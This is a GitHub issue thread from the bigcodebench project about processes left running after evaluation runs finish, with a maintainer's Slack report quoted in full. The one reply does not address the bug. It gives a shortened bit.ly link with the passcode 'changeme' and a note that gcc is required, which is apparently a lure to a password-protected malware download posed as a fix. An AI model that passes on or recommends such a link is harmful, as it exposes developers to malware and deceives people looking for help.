### ISSUE TITLE
[bug] Lingering processes after eval run completion

### ISSUE THREAD

**Issue by hvaara** [bigcode-project/bigcodebench#42]
@terryyz reported on Slack:

> One issue I haven't figured out is that there are always some live processes when the execution finishes, even though they are supposed to be killed.
> Any `bigcodebench.evaluate` commands for sanitized outputs will result in such behaviors, regardless of whether it's in the docker or outside
The example sanitized outputs can be found here: https://github.com/bigcode-project/bigcodebench/releases/tag/v0.1.5
> It's a generic issue, but I haven't found the cause.
> I fixed a bit of the customized sandbox to kill the child processes when it finishes (https://github.com/bigcode-project/bigcodebench/blob/main/bigcodebench/eval/utils.py), but it didn't resolve the issue

**Comment by Alango-Norjehan** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler
